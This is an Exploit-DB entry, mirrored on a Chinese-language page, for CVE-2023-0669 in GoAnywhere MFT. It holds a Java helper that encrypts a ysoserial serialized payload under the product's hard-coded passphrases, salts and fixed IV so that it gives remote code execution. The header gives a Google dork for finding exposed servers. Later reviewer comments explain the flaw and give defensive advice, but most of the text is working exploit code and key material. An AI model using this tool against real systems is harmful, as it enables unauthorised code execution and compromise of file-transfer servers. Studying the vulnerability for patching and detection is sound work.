Goanywhere Encryption helper 7.1.1 – Remote Code Execution (RCE)

  • 作者: Youssef Muhammad
    日期: 2023-04-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51339/
  • // Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)
    // Google Dork:title:"GoAnywhere" 
    // Date: 3/26/2023
    // Exploit Author: Youssef Muhammad
    // Vendor Homepage: https://www.goanywhere.com/
    // Software Link:https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0
    // Version:> 7.1.1 for windows / > 7.0.3 for Linux 
    // Tested on: Windows, Linux
    // CVE : CVE-2023-0669
    // This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution 
    
    import java.util.Base64;
    import javax.crypto.Cipher;
    import java.nio.charset.StandardCharsets;
    import javax.crypto.SecretKeyFactory;
    import javax.crypto.spec.PBEKeySpec;
    import javax.crypto.spec.IvParameterSpec;
    import javax.crypto.spec.SecretKeySpec;
    import java.nio.file.Files;
    import java.nio.file.Paths;
    /**
     * Helper published with the CVE-2023-0669 write-up. It encrypts the bytes of a file with
     * AES/CBC/PKCS5Padding and prints the ciphertext as URL-safe Base64. The accompanying
     * header says the input is meant to be a serialized Java object.
     *
     * <p>Reviewer notes, read from the code in this listing:
     * <ul>
     *   <li>The passphrase, salt, iteration count and IV are all compile-time constants.
     *       PBKDF2 over a constant yields a constant key, so anyone holding these values can
     *       produce ciphertext that decrypts cleanly. The encryption layer therefore proves
     *       nothing about who created a blob.</li>
     *   <li>CBC is used without a MAC or AEAD tag, so the format carries no integrity check,
     *       and the fixed IV makes the output deterministic for a given input.</li>
     *   <li>Defensive takeaway: bytes recovered by decrypting this format are untrusted
     *       input. A consumer should not hand them to native Java deserialization without a
     *       strict allow-list ({@code java.io.ObjectInputFilter}). Operators of the affected
     *       product should apply the vendor's fix for CVE-2023-0669 and keep the
     *       administrative interface off untrusted networks.</li>
     * </ul>
     */
    public class CVE_2023_0669_helper {
        /** Cipher transformation passed to {@link Cipher#getInstance(String)}. */
        static String ALGORITHM = "AES/CBC/PKCS5Padding";

        /**
         * Key bytes used by the most recent {@link #encrypt} call. The initial 30-byte array
         * is never used as a key: {@code encrypt} overwrites this field on every call.
         * NOTE(review): shared mutable static state; concurrent callers would race on it.
         */
        static byte[] KEY = new byte[30];

        /** Fixed 16-byte IV: the UTF-8 bytes of the literal below. */
        static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8);

        /**
         * Command-line entry point: reads the file named by the first argument, encrypts it
         * using the scheme selected by the second argument, and prints the encoded result.
         *
         * @param args {@code <file_path> <version>}; any other argument count prints the
         *             usage line and exits with status 1
         * @throws Exception if the file cannot be read or the cipher cannot be set up
         */
        public static void main(String[] args) throws Exception {
            boolean argCountOk = (args.length == 2);
            if (!argCountOk) {
                System.out.println("Usage: java CVE_2023_0669_helper <file_path> <version>");
                System.exit(1);
            }
            byte[] fileContent = Files.readAllBytes(Paths.get(args[0]));
            System.out.println(encrypt(fileContent, args[1]));
        }

        /**
         * Encrypts {@code data} with AES-CBC under one of the two hard-coded derived keys.
         *
         * @param data    plaintext bytes
         * @param version {@code "2"} selects the second key and appends the {@code "$2"}
         *                marker to the output; every other value selects the first key
         * @return URL-safe Base64 (padded) of the ciphertext, followed by {@code "$2"} for
         *         version 2
         * @throws Exception on any JCA failure (unknown algorithm, invalid key, and so on)
         */
        public static String encrypt(byte[] data, String version) throws Exception {
            Cipher aes = Cipher.getInstance(ALGORITHM);

            // Pick the key-derivation routine once; the same flag drives the suffix below.
            boolean useV2 = version.equals("2");
            if (useV2) {
                KEY = getInitializationValueV2();
            } else {
                KEY = getInitializationValue();
            }

            aes.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(KEY, "AES"), new IvParameterSpec(IV));
            String encoded = Base64.getUrlEncoder().encodeToString(aes.doFinal(data));
            return useV2 ? encoded + "$2" : encoded;
        }

        /**
         * Derives the "version 1" 256-bit key: PBKDF2WithHmacSHA1 over a hard-coded
         * passphrase and 8-byte salt, 9535 iterations.
         *
         * @return the derived key bytes
         * @throws Exception if the key factory is unavailable or derivation fails
         */
        private static byte[] getInitializationValue() throws Exception {
            // Version 1 Encryption
            SecretKeyFactory factory = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1");
            String passphraseText = "go@nywhereLicenseP@$$wrd";
            byte[] salt = {-19, 45, -32, -73, 65, 123, -7, 85};
            // NOTE(review): getBytes() uses the platform default charset before decoding as
            // UTF-8; for this ASCII-only literal that is a no-op on ASCII-compatible defaults.
            char[] passphrase = new String(passphraseText.getBytes(), "UTF-8").toCharArray();
            PBEKeySpec spec = new PBEKeySpec(passphrase, salt, 9535, 256);
            return factory.generateSecret(spec).getEncoded();
        }

        /**
         * Derives the "version 2" 256-bit key: PBKDF2WithHmacSHA1 over a different hard-coded
         * passphrase and 16-byte salt, 3392 iterations.
         *
         * @return the derived key bytes
         * @throws Exception if the key factory is unavailable or derivation fails
         */
        private static byte[] getInitializationValueV2() throws Exception {
            // Version 2 Encryption
            SecretKeyFactory factory = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1");
            String passphraseText = "pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R";
            byte[] salt = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73};
            // NOTE(review): same platform-charset round trip as the version 1 routine.
            char[] passphrase = new String(passphraseText.getBytes(), "UTF-8").toCharArray();
            PBEKeySpec spec = new PBEKeySpec(passphrase, salt, 3392, 256);
            return factory.generateSecret(spec).getEncoded();
        }
    }